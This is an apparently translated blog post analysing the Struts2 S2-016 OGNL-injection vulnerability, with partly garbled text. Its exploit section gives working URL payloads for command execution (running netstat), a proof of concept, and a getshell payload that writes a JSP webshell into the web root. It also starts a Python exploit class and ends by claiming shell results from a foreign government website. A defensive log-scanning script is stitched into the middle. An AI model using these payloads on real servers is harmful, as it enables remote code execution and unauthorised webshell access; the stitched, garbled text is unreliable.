Analysis of s2-016 vulnerability of STRUTS2 and exp writing

Source: Internet
Author: User

1. Overview

S2-016 was published in July 2013, when I was not yet involved in web security research, so this late analysis is also a way of catching up on the past. The vulnerability affects all Struts2 versions prior to 2.3.15.1. The problem lies in the handling of special URL prefixes: an OGNL expression placed after the redirect: or redirectAction: prefix is executed by the server.
2. Vulnerability analysis

Analysis of a vulnerability in an open source framework has to start from its source. The problem lies in DefaultActionMapper, a class mainly used to handle flexible URL calls, such as dynamic invocation of action methods, for example: http://www.foo.com/bar/hello.action?user!addfoo!bar. This form dynamically calls a method in an action, where foo is an Action and bar is the method name, but the prerequisite is that the call has been configured in struts.xml beforehand. That is only one of its functions; the class also has the important role of handling the redirect, redirectAction, method and action prefixes.
The method prefix dynamically specifies the method to call: for example, to invoke the execute method in hello, you can pass the URL http://www.foo.com/bar/hello.action?method:execute. The action prefix specifies a different action; with this prefix, the execute method of the default action named in the URL is not run, but the execute method of the other action is. Once redirect is written, the execute method of the default action is not run either; instead the request is redirected to another page, which is implemented internally through ServletRedirectResult. redirectAction likewise bypasses the default action method but redirects to another action, also relying on ServletRedirectResult to do the work. As for why the content after redirect ends up being executed as OGNL, continue with the source code: pass the following URL to the Struts2 framework and set the appropriate breakpoints.
Payload:127.0.0.1:8080/struts_hello/hello?redirect:${%23a%3dnew%20java.lang.processbuilder (new%20java.lang.String[]{% 22netstat%22,%22-an%22}). Start (). getInputStream (),%23b%3dnew%20java.io.inputstreamreader (%23a),%23c%3dnew% 20java.io.bufferedreader (%23b),%23d%3dnew%20char[51020],%23c.read (%23d),%23screen%3d%23context.get (' Com.opensymphony.xwork2.dispatcher.HttpServletResponse '). Getwriter (),%23screen.println (%23d),%23screen.close () }
The first thing DefaultActionMapper does is extract the name and namespace of the action; it then calls two methods, one of which is handleSpecialParameters, and it is this handleSpecialParameters method that has the problem. The first step is to extract redirect:${xxxxxx} as a key and then call the execute method.
Following further, one of the constructor methods is called, and which put method is invoked depends on the prefix that was identified. The most interesting one is redirect: this redirect is actually a ServletRedirectResult object. As said earlier, this is the class that handles the redirect prefix, and here it does only one thing, which is to specify the target of the redirection, that is, where the logical flow goes. key.substring(REDIRECT_PREFIX.length()) is the xxxx content in redirect:${xxxx}. Everything above is preprocessing of the URL and creation of the runtime environment and objects; StrutsPrepareAndExecuteFilter then calls the executeAction method. Some readers may ask what this mapping is. In fact, the mapping can be regarded as the parameter table of this request, which records the redirect location, action name, namespace and so on. Continuing to follow along, we arrive at StrutsResultSupport:
This method parses the parameters and uses them as OGNL expressions. The param argument is a string, which is actually ${xxx}. Entering translateVariables, the Struts2 decoration process can be seen clearly, and finally we arrive at the TextParseUtil class. Its parameters are as follows: the first is a character array that specifies which symbol may precede the curly braces, either $ or %; expression is ${xxxx}; and stack is the current value stack. In this method, the content of the curly braces is extracted first. This is just extracting the OGNL expression through a series of string operations; execution is done through the following statement, where var is the extracted OGNL expression, that is, the content of the curly braces. It then calls the stack.findValue method, and it is this method that executes the OGNL expression, handing it down to OgnlUtil for syntax tree analysis and execution, and finally returning the result. This execution is implemented in OgnlValueStack (for each node in the tree); the OGNL syntax tree algorithm is involved here and is not described further. Having analysed this far, I believe many people will understand how the OGNL is executed. This is the most fundamental point of Struts2 vulnerabilities: each Struts2 vulnerability revolves around the OGNL expression mechanism, and the different techniques (the strange forms of the various payloads) all serve to make the server execute our OGNL expression code in the end.

3. Summary

The root cause of S2-016 is that there is no strict filtering of what follows several prefixes, so an attacker can pass in a string that conforms to OGNL expression syntax and Struts2 executes it as an OGNL expression in the ValueStack, resulting in arbitrary command execution. Getshell, directory listing and echo upload are all essentially Java code execution.
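As an added example (not code from the original post), here is a defender-side check in Python that applies the analysis above to web server access logs: it URL-decodes each query parameter (repeatedly, since the post notes the payload has to be strictly URL-encoded and a second encoding layer must not hide it) and flags any parameter whose name starts with one of the DefaultActionMapper prefixes and whose remainder contains a ${ or %{ expression marker. The log lines, client addresses and timestamps are constructed samples; the log format regex assumes a common/combined access log, and the version check only encodes the 2.3.15.1 fix version stated in the overview.

```python
# Added example (not from the original post): a defender-side check that applies the
# analysis above to web server access logs. It looks for request parameters whose name
# starts with one of the DefaultActionMapper prefixes and whose remainder carries an
# OGNL expression marker (${ or %{), the shape of an S2-016 attempt.
import re
from urllib.parse import unquote

# Prefixes handled by DefaultActionMapper.handleSpecialParameters (from the analysis above)
SPECIAL_PREFIXES = ("redirect:", "redirectAction:", "action:", "method:")

# TextParseUtil evaluates text between ${ } or %{ } as OGNL
OGNL_MARKER = re.compile(r"[$%]\{")

# Request target inside a common/combined access log line (assumed log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/')

# Fix version stated in the overview: versions before 2.3.15.1 are affected
FIXED_VERSION = (2, 3, 15, 1)

# Constructed sample log lines (addresses and timestamps are made up)
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Jul/2013:10:00:01 +0000] "GET /struts_hello/hello.action?name=alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jul/2013:10:00:02 +0000] "GET /struts_hello/hello.action?redirect:/index.jsp HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Jul/2013:10:00:03 +0000] "GET /struts_hello/hello.action?redirect:%24%7B%23p%3d1%7D HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Jul/2013:10:00:04 +0000] "GET /struts_hello/hello.action?redirectAction:%2525%257B1%252b1%257D HTTP/1.1" 302 0',
]


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly; the post notes the payload must be strictly URL-encoded,
    and a second encoding layer must not hide the expression marker."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_prefix_params(request_target):
    """Return (prefix, expression) pairs for parameters that combine a special
    prefix with an OGNL expression marker. Benign uses such as redirect:/index.jsp
    or method:execute carry no ${ or %{ and are not reported."""
    hits = []
    query = request_target.partition("?")[2]
    for token in query.split("&"):
        # '+' is form encoding for space; %2b survives as a literal '+'
        param = decode_fully(token.replace("+", " "))
        for prefix in SPECIAL_PREFIXES:
            if param.lower().startswith(prefix.lower()):
                expression = param[len(prefix):]
                if OGNL_MARKER.search(expression):
                    hits.append((prefix, expression))
                break
    return hits


def scan_access_log(lines):
    """Return (client, request_target, hits) for each log line that looks like an attempt."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = find_ognl_prefix_params(match.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], match.group(1), hits))
    return findings


def is_affected_version(version):
    """True for plain numeric Struts2 versions before the 2.3.15.1 fix (e.g. '2.3.15')."""
    parts = tuple(int(p) for p in version.split("."))
    return parts < FIXED_VERSION


if __name__ == "__main__":
    for client, target, hits in scan_access_log(SAMPLE_ACCESS_LOG):
        print(client, target, hits)
```

The check deliberately keys on the combination of prefix and expression marker rather than on the prefix alone, because redirect:/index.jsp and method:execute are legitimate uses of the same mechanism; the long-term fix is the upgrade to 2.3.15.1 named in the overview, and this scan only tells you whether anyone has been probing for the weakness in the meantime.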
4. Writing the S2-016 exp

With the principle of the vulnerability analysed, writing an exp is actually not too difficult. But there is a big pitfall here: while debugging the exp I found that this vulnerability differs from earlier S2 vulnerabilities. Some special characters in the URL, such as the equals sign, space, brackets, double quotes and the # sign, must be strictly URL-encoded, otherwise the exp fails; I do not know the mechanism behind this, and interested readers can explore it. Finally, here are my vulnerability check + getshell scripts; the code is as follows:

POC: %23p%3d%23context.get (' Com.opensymphony.xwork2.dispatcher.HttpServletResponse '). Getwriter (),%23p.println (% 22HACKER%22),%23p.close ()
Getshell:%23context[%22xwork. methodaccessor.denymethodexecution%22]%3dfalse%2c%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c %23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.httpservletrequest%22%5d%2c%23b%3dnew+ Java.io.FileOutputStream (New+java.lang.stringbuilder (%23a.getrealpath (%22/%22)). Append (@[email protected]). Append (%22system.jsp%22))%2c%23b.write (%23a.getparameter ("T"). GetBytes ())%2c%23b.close%28%29%2c%23p%3d% 23context%5b%22com.opensymphony.xwork2.dispatcher.httpservletresponse%22%5d.getwriter%28%29%2c%23p.println%28% 22done%22%29%2c%23p.flush%28%29%2c%23p.close%28%29
# coding=utf-8
import sys
import requests

class StrutsExploit():
    def __init__(self):
        self.webshell = '<%@ page language="java" pageEncoding="GBK"%><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/>
Test Run Results:
Shell results (foreign government website):
